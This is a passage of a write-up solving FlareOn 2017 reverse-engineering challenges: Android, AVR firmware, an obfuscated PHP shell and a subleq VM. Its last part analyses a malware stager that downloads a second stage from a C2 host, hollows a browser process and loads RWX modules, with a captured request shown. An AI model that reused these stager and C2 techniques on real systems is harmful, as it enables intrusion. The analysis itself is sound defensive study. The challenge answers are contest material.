So now we know how the decoding key is built, but we don’t know which PE to use. This guessing game made me lose too much time. The hint was to use 2016 PE files from last year’s FlareOn challenge.
In the many folders of
the FlareOn3 archive
(pass: flare), we could find several PE files whose timestamps match perfectly
with the ones we are looking for. All we need now is drop those files in the
flareon2016challenge directory, and tweak
notepad.exe to update its
timestamp. After 4 executions we get the
key.bin file properly filled:
➜ xd ~/ctf/flareon_2017/4/key.bin 00000000 55 8b ec 8b 4d 0c 56 57 8b 55 08 52 ff 15 30 20 |U...M.VW.U.R..0 | 00000010 c0 40 50 ff d6 83 c4 08 00 83 c4 08 5d c3 cc cc |.@P.........]...| 00000020
And after updating
notepad to the last PE timestamp, we get:
Challenge 5
Instruction
You're doing great. Let's take a break from all these hard challenges and play a little game.
Solution
pewpewboat.exe is not a PE file but an
x64 ELF that starts a nice ASCII implementation
of the Battleship game.
root@kali2:/ctf/flareon_2017/5 # ./pewpewboat.exe Loading first pew pew map... 1 2 3 4 5 6 7 8 _________________ A |_|_|_|_|_|_|_|_| B |_|_|_|_|_|_|_|_| C |_|_|_|_|_|_|_|_| D |_|_|_|_|_|_|_|_| E |_|_|_|_|_|_|_|_| F |_|_|_|_|_|_|_|_| G |_|_|_|_|_|_|_|_| H |_|_|_|_|_|_|_|_| Rank: Seaman Recruit Welcome to pewpewboat! We just loaded a pew pew map, start shootin'! Enter a coordinate:
The binary starts by initializing the PRNG with the current timestamp, then allocated a 0x240 in the heap, and starts populating it randomly. It then enters a loop of game, where the player (us) have 0x64 attempts to win the game.
Inside the loop, the function
play() (at 0x4038d6) is called and will print the game grid
and display whether your shot was hit or miss. The coordinates themselves are
read from the function
enter_coor() (at 0x40377d).
So if we want to win, we need to
- disable the randomness of the game board
- determine which values are being compared when we set coordonates
To disable the randomness, I simply used
LD_PRELOAD variable against a
homemade shared library that will override calls to
rand() and
rand() to a
deterministic output:
// Compile with : $ gcc -shared -fPIC disable_time.c -o disable_time.so // Load in GDB with: gef➤ set environment LD_PRELOAD=disable_time.so #include <time.h> #include <stdlib.h> time_t time(time_t *t){ return 0; } int rand(void){ return 0; }
With randomness out of the way, our board game with the position of all the ships will be the same at every runtime.
The function
draw_grid() called with a pointer to the game board as
parameter. By reading it, the function knows how to print a cell (empty, full)
and therefore knows the configuration of the board.
gef➤ bp *0x403c3a gef➤ dps $rdi l1 0x0000000000614010│+0x00: 0x0008087808087800 ← $rax, $rdi
This is a bitmask representing the position of the board: to make easier I wrote a Python function to convert this value into a list of position on the board:
>>> def convert_to_solution(rdi): line = bin(rdi)[2:].rjust(64,'0') table = [line[i:i+8] for i in range(0, len(line), 8)][::-1] for i in range(len(table)): row = table[i][::-1] for j in range(len(row)): if row[j] == '1': print("%c%c " % ( chr(i+ord('A')), str(j+1)), end="") else: print(" ", end="") print("") >>> convert_to_solution(0x0008087808087800) B4 B5 B6 B7 C4 D4 E4 E5 E6 E7 F4 G4 >>>
We get 2 things: one, we have all the positions for the ennemi boats; two, the disposition of the boats on the board forms an ASCII letter (here ‘F’).
By advancing through all the levels, we can collect more letters:
- 0x0008087808087800 → “f”
- 0x008888f888888800 → “h”
- 0x7e8181f10101817e → “g”
- 0xf090909090000000 → “u”
- 0x0000f8102040f800 → “z”
- 0x0000000905070907 → “r”
- 0x7010701070000000 → “e”
- 0x0006090808083e00 → “j”
- 0x1028444444000000 → “v”
- 0x0c1212120c000000 → “o”
Reaching the final level and entering the valid positions of boats gets a message:
Final answer: Aye! You found some letters did ya? To find what you're looking for, you'll want to re-order them: 9, 1, 2, 7, 3, 5, 6, 5, 8, 0, 2, 3, 5, 6, 1, 4. Next you let 13 ROT in the sea! THE FINAL SECRET CAN BE FOUND WITH ONLY THE UPPER CASE. Thanks for playing!
By simply applying this formula, we find the result to be
ohgjurervfgurehz
which when in uppercase ROT13-ed gives
BUTWHEREISTHERUM. Give this password as
input, and after a bit of computation time obtain the key to finish the level:
Challenge 6
Instruction
I hope you enjoyed your game. I know I did. We will now return to the topic of cyberspace electronic computer hacking and digital software reverse engineering.
Solution
payload.dll is a PE32+ DLL x86-64. The
DLL doesn’t sweat much info out of the box, so I decide to use both dynamic and
static analysis. Although the static part is perfectly handled by IDA, I wanted
the dynamic analysis to be custom so I had to make a small loader for this
library.
Since the notation is stdecl, the arguments are passed to registers in the following order: rcx, rdx, r8, r9
#include <windows.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #define DLL_LOCATION TEXT("F:\\flareon_2017\\6\\payload.dll") typedef void (__stdcall *FuncType)(uint64_t, uint64_t, uint64_t, uint64_t); /* Call the location at `addr` with [a1 .. a4] as arguments. */ void CallWithArgs(uintptr_t addr, uint64_t a1, uint64_t a2, uint64_t a3, uint64_t a4) { PrintDebug("[+] calling %1!p!\n", (va_list*)&addr); DebugBreak(); ((FuncType)(addr))(a1,a2,a3,a4); } /* Print debug message directly in WinDBG. */ VOID PrintDebug(LPTSTR pMsgFmt, va_list* pArgs) { CHAR pMsg[128] = {0,}; FormatMessage(FORMAT_MESSAGE_FROM_STRING | FORMAT_MESSAGE_ARGUMENT_ARRAY, pMsgFmt, 0, 0, pMsg, sizeof(pMsg), (va_list*)pArgs); OutputDebugString(pMsg); return; } /* main() */ int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { HMODULE handle = LoadLibraryEx(DLL_LOCATION, NULL, 0); PrintDebug("[+] DLL allocated at %1!p!\n", (va_list*)&handle); DebugBreak(); /* do more stuff here */ FreeLibrary(handle); return 0; }
With this simple library loader, I have an accurate way of invoking any location withing the DLL and display runtime information directly inside WinDBG.
IDA quickly pointed me to the function at offset 0x5A50 - which I’ve called
Func3(). The loop at 0x180005B05 is a simple
strcmp() like loop comparing
arg1 (that we control) to a value from the DLL.
When WinDBG break at this location, we can get the value of the value our argument is compared to:
0:000> bp payload+0x5b05 0:000> g Breakpoint 0 hit payload+0x5b05: 000007fe`f38e5b05 0fb610 movzx edx,byte ptr [rax] ds:000007fe`f38e4240=6f 0:000> da rax 000007fe`f38e4240 "orphanedirreproducibleconfidence" 000007fe`f38e4260 "s"
Using the loader, we can now invoke this function easily:
// inside WinMain uintptr_t Func3 = handle + 0x5A50 ; PCHAR a3 = "orphanedirreproducibleconfidences"; CallWithArgs(Func3, 0, 0, a3, 0);
Which when compiled and executed triggers to display the following MessageBox:
We get one letter of the key! Good start, but how could we get more? And why do we get the 26th character? To know that we must understand the function 0x180005D30:
This function gets a pointer to the Export Directory table then calls the function 0x180004710:
.text:000000018000471E mov [rsp+48h+var_18], rax .text:0000000180004723 lea rcx, [rsp+48h+SystemTime] ; lpSystemTime .text:0000000180004728 call cs:GetSystemTime .text:000000018000472E movzx eax, [rsp+48h+SystemTime.wMonth] .text:0000000180004733 movzx ecx, [rsp+48h+SystemTime.wYear] .text:0000000180004738 add eax, ecx .text:000000018000473A cdq .text:000000018000473B mov ecx, 1Ah .text:0000000180004740 idiv ecx .text:0000000180004742 mov eax, edx
Or better in pseudo-code
GetSystemTime(&SystemTime); return (SystemTime.wYear + SystemTime.wMonth) % 0x1a;
Since FlareOn goes from September 2017 to October 2017, the possible return
values are 24 if executed in September, or 25 if in October. We know why we
got
key[25] now, but we don’t know where the passphrase comes from. This is
done in the function 0x180005C40 that will do the decoding of a part of
.rdata
at index given by the return of function 0x180004710.
So to get the keys, we must decode all sections in
.rdata:
for (int i=0; i<=24; i++){ uint64_t DecodeRdataFunc = 0x5D30; uintptr_t addr = handle + DecodeRdataFunc; CallWithArgs(addr, i, p2, p3, p4); }
The following passphrases are collected:
PCHAR pPasswords[] = { "filingmeteorsgeminately", "leggykickedflutters", "incalculabilitycombustionsolvency", "crappingrewardsanctity", "evolvablepollutantgavial", "ammoniatesignifiesshampoo", "majesticallyunmarredcoagulate", "roommatedecapitateavoider", "fiendishlylicentiouslycolouristic", "sororityfoxyboatbill", "dissimilitudeaggregativewracks", "allophoneobservesbashfulness", "incuriousfatherlinessmisanthropically", "screensassonantprofessionalisms", "religionistmightplaythings", "airglowexactlyviscount", "thonggeotropicermines", "gladdingcocottekilotons", "diagrammaticallyhotfootsid", "corkerlettermenheraldically", "ulnacontemptuouscaps", "impureinternationalisedlaureates", "anarchisticbuttonedexhibitionistic", "tantalitemimicryslatted", "basophileslapsscrapping", "orphanedirreproducibleconfidences" };
And then force calling the
Func3() function with the specific password:
addr = mz + Func3; p3 = (uint64_t)pPasswords[i]; CallWithArgs(addr, p1, p2, p3, p4);
That will print out successively the key parts via successive
MessageBox calls.
0x77, 0x75, 0x75, 0x75, 0x74, 0x2d, 0x65, 0x78, 0x70, 0x30, 0x72, 0x74, 0x73, 0x40, 0x66, 0x6c, 0x61, 0x72, 0x65, 0x2d, 0x6f, 0x6e, 0x2e, 0x63,
which translated gives
wuuut-exp0rts@flare-on.com
Challenge 7
Instruction
I want to play another game with you, but I also want you to be challenged because you weren't supposed to make it this far.
Solution
zsud.exe is a PE32 binary. Running
strings and
binwalk against it immediately shows 2 things:
- this binary is C# compiled
- it embeds a DLL
$ binwalk zsud.exe DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 0 0x0 Microsoft executable, portable (PE) [...] 356528 0x570B0 Microsoft executable, portable (PE) 362328 0x58758 Base64 standard index table
This DLL,
flareon.dll, can be easily extracted with a simple
dd command, and
shows some strings like “
soooooo_sorry_zis_is_not_ze_flag”, but not really
interesting (yet). Debugging the binary with
dnSpy gives a whole new view as to what
it’s doing: the function
Smth() receives a Base64 encoded string, which once decoded is
AES decrypted with the key “
soooooo_sorry_zis_is_not_ze_flag”. The result is a
Powershell script that is being invoked, and that is another maze game, entirely
written in Powershell. The script can be downloaded here.
The game is an escape room, so it would make sense that the flag will be given to us if we escape! And since it’s a maze, we need to find the proper directions, which comes into 2 parts.
First part of the directions
Getting the first part of the directions is relatively simple.
zsud.exe starts
a webservice
on
127.0.0.1/9999
so it is possible to bruteforce the first directions by generating HTTP requests
and analysing the output:
def send(directions, description, verbose=False): url = "{k:s}&e={e:s}".format(k=directions, e=description) h = requests.get(url) if h.status_code==200 or "@" in h.text: return h.text return None key_directions = {0: "n", 1:"s", 2:"e", 3:"w", 4:"u", 5:"d" } directions = "" d = key_desc.split()[-1] prefix = [] i = 0 while True: valid = False for c in key_directions.keys(): temp = directions + key_directions[c] desc = d.replace('+', '-').replace('/', '_').replace('=', '%3D') p = send(temp, desc) if p: directions = temp p, s = p.split() prefix.append(p) print("[!] dir='%s' prefix='%s' next='%s...'" % (directions, ' '.join(prefix), s[:16])) d = s valid = True if not valid: break i+=1
And we start getting the beginning of the path:
directions ='wnneesssnewne' prefix = 'You can start to make out some words but you need to follow the'
Second part of the directions
By following the directions found above, we end up in the “infinite maze of
cubicles”
(confirmed by the PowerShell script). The
cubicles are linked through random connections to one another. To find the way,
we must be able to predict the
generation. At
line 431 we
see that if we transfer the key (located in the desk drawer), the script will
trigger a call to
srand(42). The implementation of
msvcrt::rand() is an
known algorithm that goes along the lines of
seed = 42 def rand(): global seed new_seed = (0x343fd * seed + 0x269ec3) & ((1 << 32) - 1) randval = (new_seed >> 0x10) & 0x7fff seed = new_seed return randval
Which now makes the path predictable, and we get the final directions:
directions += 'ewwwdundundunsuneunsewdunsewsewsewsewdun'
Final wrap-up
If we now follow the entire directions found above
wnneesssnewne +
ewwwdundundunsuneunsewdunsewsewsewsewdun, we get the final message
RIGHT_PATH!@66696e646b6576696e6d616e6469610d0a, so the complete answer to the
maze is
directions ='wnneesssnewneewwwdundundunsuneunsewdunsewsewsewsewdun' prefix = 'You can start to make out some words but you need to follow the RIGHT_PATH!@66696e646b6576696e6d616e6469610d0a'
But still no flag. The hex-encoded block right nexto
RIGHT_PATH says to:
>>> "66696e646b6576696e6d616e6469610d0a".decode('hex') 'findkevinmandia\r\n'
By going back to the Powershell script using Powershell ISE, we notice that the
only place Kevin is mentioned is in the function
Invoke-Say(). We then seek the function
Invoke-Say() and force the
if branch to be taken by setting the
$helmet
variable to not None, and the
$key to the path we found:
$key = "You can start to make out some words but you need to follow the RIGHT_PATH!@66696e646b6576696e6d616e6469610d0a" $helmet = 1;
Then execute only this portion of code to see:
Which unhexlified gives the flag:
>>> "6d756464316e675f62795f7930757235336c706840666c6172652d6f6e2e636f6d".decode('hex') mudd1ng_by_y0ur53lph@flare-on.com
Challenge 8
Instruction
You seem to spend a lot of time looking at your phone. Maybe you would finish a mobile challenge faster. I want to play another game with you, but I also want you to be challenged because you weren't supposed to make it this far.
Solution
This really fun challenge offers an Android APK
file,
flair.apk. The static analysis was
exclusively done with JADX and I used the awesome GenyMotion + JDB for the dynamic analysis.
This app presents itself as a traditional Android app,
com.flare_on.flair:
You can get the final flag by solving the 4 mini challenges:
1. Micheal 2. Brian 3. Milton 4. Printer
1. Michael
Using
JADX, we can reach easily the method
simply solve com.flare_on.flair.Michael.checkPassword():
Which trivially gives us the first answer:
MYPRSHE__FTW
2. Brian
Using
jdb, it is possible to break at any location inside a running Android
app. JADX shows that when the validation button is clicked on, the method
com.flare_on.flair.Brian.teraljdknh() is called and checked for success. This
function is a simple
memcmp()-like function, so we can break on it and dump
its arguments:
$ jdb -attach localhost:8700 > methods com.flare_on.flair.Brian [...] com.flare_on.flair.Brian dfysadf(java.lang.String, int, java.lang.String,java.lang.String) com.flare_on.flair.Brian teraljdknh(java.lang.String, java.lang.String) [...] > stop in com.flare_on.flair.Brian.teraljdknh (when break hits) > locals Method arguments: v = "AAAA" Local variables: m = "hashtag_covfefe_Fajitas!"
We get the answer:
hashtag_covfefe_Fajitas!
3. Milton
In the
Milton class, we can see that the input field is not enabled unless the
rating is equal to 4 (i.e. give 4 stars).
The
onClick event will call the method
breop(<given_password>). That method
will compare our input with the result of the call to the function
nbsadf().
nbsadf() does nothing but call
Stapler.poserw().
So let’s break on that with jdb:
> stop in com.flare_on.flair.Stapler.poserw (wait for it) > main[1] dump intr intr = { 65, 32, 114, 105, 99, 104, 32, 109, 97, 110, 32, 105, 115, 32, 110, 111, 116, 104, 105, 110, 103, 32, 98, 117, 116, 32, 97, 32, 112, 111, 111, 114, 32, 109, 97, 110, 32, 119, 105, 116, 104, 32, 109, 111, 110, 101, 121, 46 } > stop in java.util.Arrays.equals(byte[], byte[])
The variable
intr holds our answer:
A rich man is nothing but a poor man with
money. Once decoded, we see that
Stapler.poserw() is nothing more than a SHA1
checksuming function.
So the answer is
>>> import hashlib >>> hashlib.sha1('A rich man is nothing but a poor man with money.').hexdigest() 10aea594831e0b42b956c578ef9a6d44ee39938d
4. Printer
The check in the
Printer class takes the same principles than the ones covered
in
Milton. After deobfuscation, we can see that the check is also performed
against
Stapler.poserw().
So use jdb to break and dump the values
> stop in java.util.Arrays.equals(byte[], byte[]) > stop in com.flare_on.flair.Stapler.poserw
And we get:
>>> import hashlib >>> hashlib.sha1("Give a man a fire and he'll be warm for a day. Set a man on fire and he'll be warm for the rest of his life.") 5f1be3c9b081c40ddfc4a0238156008ee71e24a4
And finally:
Challenge 9
Instruction
One of our computer scientists recently got an Arduino board. He disappeared for two days and then he went crazy. In his notebook he scrawled some insane jibberish that looks like HEX. We transcribed it, can you solve it?
Solution
The challenge is in a text file
named
remorse.ino.hex. This format
(Intel HEX)
is frequently used for sharing encoded firmwares, and so the
python-intelhex
module provides a useful script to convert it back to binary
(
hex2bin.py). From the string inside the firmware, we learn that this firmware
is meant to be
used on
a Arduino Uno board. This
board embeds an Atmel AVR 8bit CPU, running at 16MHz. Easily
enough, Google points us to the datasheet of the processor.
Being totally new to AVR, I stop the challenge at that point for long enough to
read a good part of the datasheet, which proved to be extremely useful for the
rest of this exercise.
With a much better understanding of AVR, I setup a SimAVR environment and also
compiled
simduino, which allows me to connect a GDB to it, and debug the runtime:
$ obj-x86_64-linux-gnu/simduino.elf -d -v -v ../../../remorse.ino.hex
Simduino will open a /dev/pts that can be used for UART (so we can use tools
like
picocom or
minicom to debug it).
The firmware seems to be expecting a new PIN configuration: luckily I came accross this information in the datasheet (“35. Register Summary”).
After trying to manipulate the PINB and PINC (resp. at offset 0x23 and 0x26) without success, I saw that a change of value in PIND (offset 0x29) immediately provoked a response from the firmware:
$ avr-gdb -q -ex 'target remote localhost:1234' [...] (gdb) set {char}0x29=0
In
picocom:
Flare-On 2017 Adruino UNO Digital Pin state:0
Since the possible values are limited to 1 byte (8bit), and being lazy I wrote a GDB script to bruteforce all the values
set $_i = 0 define inc_pind set $_i = $_i + 1 set {char}0x29=$_i continue end
And then I use
xdotool to programmatically send the right xkeysyms commands to
the GDB terminal:
$ i=0; while [ $i -lt 256 ]; do sleep 5 ; xdotool key ctrl+c Up Return ; i=$((i + 1)); done
Went for a coffee, and when back saw the pleasant screen:
This challenge was a good reminder that reading the documentation first kept me from spending probably hours of not understanding how the CPU was getting input/output data from the PIN or what the ABI was doing. So more than ever, RTFM!
Challenge 10
Instruction
We have tested you thoroughly on x86 reversing but we forgot to cover some of the basics of other systems. You will encounter many strange scripting languages on the Information Superhighway. I know that Interweb challenges are easy, but we just need you to complete this real quick for our records.
Solution
Another guessing game type of challenge. The challenge comes as a PHP script
named
shell.php. It was solvable in 3 different steps:
Step 1: get the key length
This script is a mess so the cleaned version was pushed here.
This challenge is not about cracking the MD5 hash given, but reversing the way
the variable
$block is manipulated with the XOR operation. We don’t know the
key
$param, including its length. However, we do know that after L4 the
strlen($param) will be in [32..64]. Additionally, we know after this line that
every byte of
$param is in the hexadecimal namespace (“0123456789abcdef”). And
finally, because of the call
to
create_function
line 15, we know that the block once de-XOR-ed will have all bytes in
string.printable.
Now the guessing game starts: we must guess at the same time the length and the key. So the idea is in pseudo-code
assuming len(key) = 32 assuming charset = "0123456789abcdef" let candidate = (key[0], len(32)) test if key[0] ^ block[0] in string.printable and \ if (key[0] ^ block[0]) ^ block[0 + len(key)]in string.printable and \ etc. if any fails: reject candidate
This gives us a good iteration pattern, allowing us to narrow down all possible
values and find the possible length for the key, as done in
bf1.py
$ python bf1.py pos=0 char='c' len=64 pos=0 char='d' len=64 pos=0 char='e' len=64 pos=1 char='a' len=64 pos=1 char='b' len=64 pos=1 char='c' len=64 pos=1 char='d' len=64 pos=1 char='e' len=64 pos=2 char='0' len=64 pos=2 char='1' len=64 pos=2 char='2' len=64 pos=2 char='3' len=64 [...]
Unanimously, we find that if the length of
$param is 64 bytes, we have at
least one candidate that ensures that we can de-xor
$block and get ASCII back
for each byte of the key.
So if
$param = md5($param) . substr(MD5(strrev($param)), 0, strlen($param));
and
strlen($param) == 64, it means that our key
o_o is 32 byte long, which
way too huge to bruteforce. Consequently we must unxor the block by another way,
without knowing the key.
Step 2: unxor all the blocks!
The Step1 allowed us to get the key length along with a list of potential candidates for each position ([0, 63]). This 2nd step directly extends the earlier one by trying to bruteforce chunk by chunk.
This will be the main idea:
possible_candidates = {0: "abc", 1: "012", 2: "f", etc...} possible_block = [] block_size = 4 # pure assumption for candidate in generate_all_candidates( possible_candidates[0:block_size] ): if candidate ^ block[key_length*0:key_length*0 + 4] in string.printable and \ candidate ^ block[key_length*1:key_length*1 + 4] in string.printable and \ candidate ^ block[key_length*2:key_length*2 + 4] in string.printable and \ etc.. : possible_block.append(candidate)
I used Python’s
itertools.product to generate all the candidate blocks, and
little by little recovered the value for
$param:
$ python bf2.py possible_key=de6952b84a49b934acb436418ad9d93d237df05769afc796d063000000000000 (0, '$c=\'\';\r\n$key = "";\r\nif (isset($_POST[\'o_o\']))\r\n $ka') (64, 'oXo\'];\r\nif (isset($_POST[\'hint\']))\r\n $d = "*') (128, "stet($_POST['t'])) {\r\n if ($_POST['t'] == 'c') {\r\n$") (192, "63_decode('SDcGHg1feVUIEhsbDxFhIBIYFQY+VwMWTyAcOhEYE") (256, 'DJXTWxrSH4ZS1IiAgA3GxYUQVMvBFdVTysRMQAaQUxZYTlsTg0MA') (320, 'whbXgcxHQRBAxMcWwodHV5EfxQfAAYrMlsCQlJBAAAAAAAAAAAAE') [...]
After a few iteration, it appears that the encoded block contains not just pure PHP but also HTML, which allowed me to perfect the condition for finding a valid candidate
After many iterations, we get the value for
$param:
$param = "db6952b84a49b934acb436418ad9d93d237df05769afc796d067bccb379f2cac";
Step 3
Entering the correct value for
$param found in step 2 allow us to discover the
decoded script passed
to
create_function().
And back to square 1, we have 3 new base64-encoded blocks to decode. Depending
on the value given in the
$_POST['t'] (can be ‘c’, ‘s’ or ‘w’), will split the
key every 3 character, starting from index 0, 1, or 2 (respectively).
I took a huge assumption here, which was that
$key would be the flag to end the
challenge. Therefore, even though we don’t know its length (yet), we know that
it ends with
@flare-on.com.
So for this step, I used the same technique than step2 but split the key every 3 characters and see if the block of byte was successfully decoded.
key = "fla"+"re-"+"on."+"com" for j in range(3): k = key[j::3] for i in range(11): x = xor( b64d(c), "A"*i+k)[i::i+len(k)] if is_all_printable(x): print j, i, repr(x)
Just like step1 this approach gives us 2 possible length for the flag prefix
(i.e. before
@flare-on.com): 8 or 9 bytes.
So there again, semi-manual bruteforce:
i = 9 k0 = key[0::3] for t in string.printable: p = "A"*(i-1) + t + k0 x = xor(b64d(c), p) b = all_printable_blocks(x, i-1, len(p), len(p)-(i-1)) if b != []: print p, b
We quickly notice that the output has some HTML in it, so we can discard candidates with invalid HTML patterns. For example:
➜ python bf.py AAAAAAAA0froc ['8titl', 'ged C', '`</ti', ')- Ma', "41' H", '\t\n<bo', 'pext=', 'klor=', 'kd0="', '0froc', '$titl', 'phieu', 'anri"', 'gript', 'perva', '/=7,i', "X\\n';", '/=P[i', 'n-j+n', '6])j=', 'jerHT', 'ge(4)', '+scri', 'kdy>\r'] AAAAAAAA2froc [':titl', 'eed C', 'b</ti', '+- Ma', "61' H", '\x0b\n<bo', 'rext=', 'ilor=', 'id0="', '2froc', '&titl', 'rhieu', 'cnri"', 'eript', 'rerva', '-=7,i', "Z\\n';", '-=P[i', 'l-j+n', '4])j=', 'herHT', 'ee(4)', ')scri', 'idy>\r'] AAAAAAAA3froc [';titl', 'ded C', 'c</ti', '*- Ma', "71' H", '\n\n<bo', 'sext=', 'hlor=', 'hd0="', '3froc', "'titl", 'shieu', 'bnri"', 'dript', 'serva', ',=7,i', "[\\n';", ',=P[i', 'm-j+n', '5])j=', 'ierHT', 'de(4)', '(scri', 'hdy>\r'] AAAAAAAA4froc ['<titl', 'ced C', 'd</ti', '-- Ma', "01' H", '\r\n<bo', 'text=', 'olor=', 'od0="', '4froc', ' titl', 'thieu', 'enri"', 'cript', 'terva', '+=7,i', "\\\\n';", '+=P[i', 'j-j+n', '2])j=', 'nerHT', 'ce(4)', '/scri', 'ody>\r'] AAAAAAAA5froc ['=titl', 'bed C', 'e</ti', ',- Ma', "11' H", '\x0c\n<bo', 'uext=', 'nlor=', 'nd0="', '5froc', '!titl', 'uhieu', 'dnri"', 'bript', 'uerva', '*=7,i', "]\\n';", '*=P[i', 'k-j+n', '3])j=', 'oerHT', 'be(4)', '.scri', 'ndy>\r'] [...]
Only code with key=AAAAAAAA4froc makes most sense so it must be it. So we’ll
assume this is how the key ends, and bruteforce the byte before, and so on, and
so forth. Reiterating this for all bytes, we get the first subkey to be
k0='t_rsaat_4froc'.
And reiterating the exact same thing for the 2nd and 3rd base64-encoded block and we get all the subkeys:
>>>>>>>>> ''.join([''.join(x) for x in zip(k0, k1, k2)]) 'th3_xOr_is_waaaay_too_w34k@flare-on.com'
Challenge 11
Instruction
Only two challenges to go. We have some bad hombres here but you're going to get the keys out.
Solution
This challenge was out of space! And so fun! It comes as a PE32 file
named
covfefe.exe.
The most notable string () from the PE points us nostalgically to Rick Astley timeless masterpiece, “Never Gonna Give You Up”.
Many other strings appear, but are weirdly aligned to one DWORD per character:
Actually
covfefe.exe is very simple, and only asks for finding a correct
password. The PE itself only:
- randomly chooses an integer in [0, 9[ and store in 0x0403008+0x110*4
- starts the VM itself at 0x0403008, and jumps to it
The VM is an array of
int32_t so
logique_addr_in_pe = 0x0403008 + relative_addr_in_vm*4
The execution of the virtual machine starts at
pc_start = vm + 0x463. And each
instruction is executed in the same way:
execute_instruction(operand1, operand2, operand3) { [operand2] = [operand2] - [operand1] if [operand2] <= 0 && operand3 != -1: pc = op3 // jump_to }
Since the code is super easy, I decided to recreate the C source code from it. So first, I used WinDBG to dump the VM location:
0:000> .writemem F:\flareon_2017\11\dumpmem-00403000-L5000.dmp
And used this to create a C script that would run the VM as well. The reason for that is that now I can set breakpoint and analyse the VM more precisely. I also used Binary Ninja to write a new custom architecture. The reason for that being that it greatly helped tracking down operations at the bytecode level of the VM.
We know that we must provide a good password to validate the task. So there must be a comparison that fails as soon as a wrong character is entered. Those new tools were of great help to identify the culprit: the comparison instruction is done in the block at 0xde6.
Now that we know that, all I need was to use the C script to “set a breakpoint”
at 0xde9 and see what value was expected.
Knowing this, creating the bruteforce script (cov.py) was the next immediate step:
And finally recover the key to this level =
subleq_and_reductio_ad_absurdum.
Challenge 12
Instruction
Sorry, we don't have a challenge for you. We were hacked and we think we lost it. Its name was "lab10" . The attacker left one binary behind and our sophisticated security devices captured network traffic (pcap) that may be related. If you can recover the challenge from this and solve it then you win the Flare-On Challenge. If you can't then you do not win it.
Solution
This level alone could have been an entire CTF. It came as 2 files:
- an 85KB PE32 file,
coolprogram.exe
- a 5.5MB PCAP trace,
20170801_1300_filtered.pcap
Extracting secondstage.exe
coolprogram.exe is a Borland compiled PE file that is nothing more than a
stager to download and execute the real payload. Using API Monitor, we can trace
that it attempts to connect to FQDN
maybe.suspicious.to, checking also that
the domain name doesn’t point to the localhost
The behavior seems consistant with the first TCP stream of the PCAP. However, the data received seems encoded/encrypted:
GET /secondstage HTTP/1.1 Accept: */* Accept-Language: en-us User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) Host: maybe.suspicious.to Cache-Control: no-cache HTTP/1.0 200 OK Server: SimpleHTTP/0.6 Python/2.7.12 Date: Tue, 01 Aug 2017 17:04:02 GMT Content-type: application/octet-stream Content-Length: 119812 Last-Modified: Tue, 01 Aug 2017 14:46:13 GMT 7.=|...WEz.....:&.uBLA.5.su..m..>j.-....4..|.....Mu%R{.......U..(Fl.;./.....QM.G...O [...]
IDR and IDA helped identify the “real main” function to be at 0x04103DC, which performs sequentially the following operations:
- unxor the URL from memory: the URL is located at 0x04102B4 and xor-ed with 0x73
- perform the HTTP GET request to get the
secondstage
- decode the buffer, recovering a valid PE file,
secondstage.exe
- invoke
secondstage.exeby hollowing the default HTTP browser
Instead of decoding manually the encoded response from the C2 server, we can be
lazy by recovering
secondstage.exe breaking at 0x4104C1:
0:000> bp 0x4104C1; g Breakpoint 0 hit [...] 0:000> !dh edx File Type: EXECUTABLE IMAGE FILE HEADER VALUES 14C machine (i386) 5 number of sections 592F22F3 time date stamp Wed May 31 13:09:23 2017 0 file pointer to symbol table 0 number of symbols E0 size of optional header 102 characteristics Executable 32 bit word machine [...] 0:000> .writemem F:\flareon_2017\12\secondstage.exe edx l1d400 Writing 1d400 bytes...........................................................
Initial analysis secondstage
Thanks to CFF Explorer, one can easily edit
secondstage.exe PE header to
deactivate the randomization of the code by
unsetting
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE
and rebuild the header.
secondstage analysis starts at 0x405220 by initializing a bunch a stuff,
including loading all dynamically loaded functions into an array of points,
ensuring a bit of obfuscation during static analysis, since all function calls
will be performed by indirect calls. Then if the executable is run on
client-side, initiates the connection to the C2 server:
Every time a packet is received the function 0x0402C50 is called for parsing the
new message, and sending the answer back. The C2 is still behind the FQDN
maybe.suspicious.to which in the PCAP file is associated to the IP address
52.0.104.200.
Reversing the communication protocol
A big part of this challenge consisted in understanding the protocol, because once entirely assimilated, every piece of code would fall into place.
An initial glimpse into the second TCP stream of the PCAP reveils already many valuable information regarding the protocol:
- it is a non-standard (i.e. custom) binary protocol
- it is (for most part) non encrypted
- some parts of the header can be instantly recognized (magic=’2017’, the size of the header, size of the data, etc.)
- it transmits some PE code (presence of strings like “text”, “rdata”, “reloc”, “kernel32.dll”, names of methods, etc.)
The function 0x403210 reveals a whole deal regarding the protocol: when a new packet is received, the function ensures that its length is at least 0x24 bytes, and that the first 4 bytes are equal to “2017”. This will be the aspect of the first 0x24 bytes of header:
0000 "2017" 0004 DataCheckSum 0008 HeaderSize 000c DataSize 0010 DataSize2 // this field is explained later on 0014 Magic_of_Module
What the hell are those modules? What is their magic number?
To understand that, I wrote a “replayer” that would spoof the C2 IP address, and
replay all the packets to the instance of
secondstage. After a few packets,
the
!address showed that some new memory areas were allocated in the address
space, all with
PAGE_EXECUTE_READWRITE permission, all starting with
LM.... Searching for the constant 0x4d4c (‘LM’ in little endian), IDA spotted
the instruction
004053CE cmp edx, 4D4Ch, which happens to be followed by a
call to
Kernel32!VirtualAlloc() with
PAGE_EXECUTE_READWRITE (0x40) set for
permission, then a
LoadLibraryA. This must be it, so we can now use WinDBG to dump all those modules:
0:000> bp 004053ce ; g 0:000> dd ecx+poi(ecx+3c)+50 l1 0018d2b8 00017000 0:000> .writemem E:\secondstage-lm-<id>.dll ecx lpoi(ecx+poi(ecx+3c)+50) Writing 17000 bytes..............................................
8 modules were found. Each of them can be convert back to a valid PE format by replacing “LM\x00\x00” with “MZ\x00\x00”, and “NOP\x00” with “PE\x00\x00”. Finally the entrypoint must be xored with the value 0xABCDABCD.
Reversing the “Loadable Modules”
All those modifications give us 8 DLL that are sent by the C2 and loaded in
secondstage, with the following names in them
- r.dll
- t.dll
- 6.dll
- x.dll
- z.dll
- f.dll
- s.dll
- m.dll
Using Diaphora to bin-diff those DLL showed that they are 99% similar, except for a handful of functions. So naturally I focused reversing only those functions.
In all DLLs (and even
secondstage), one function could always be found doing
something like:
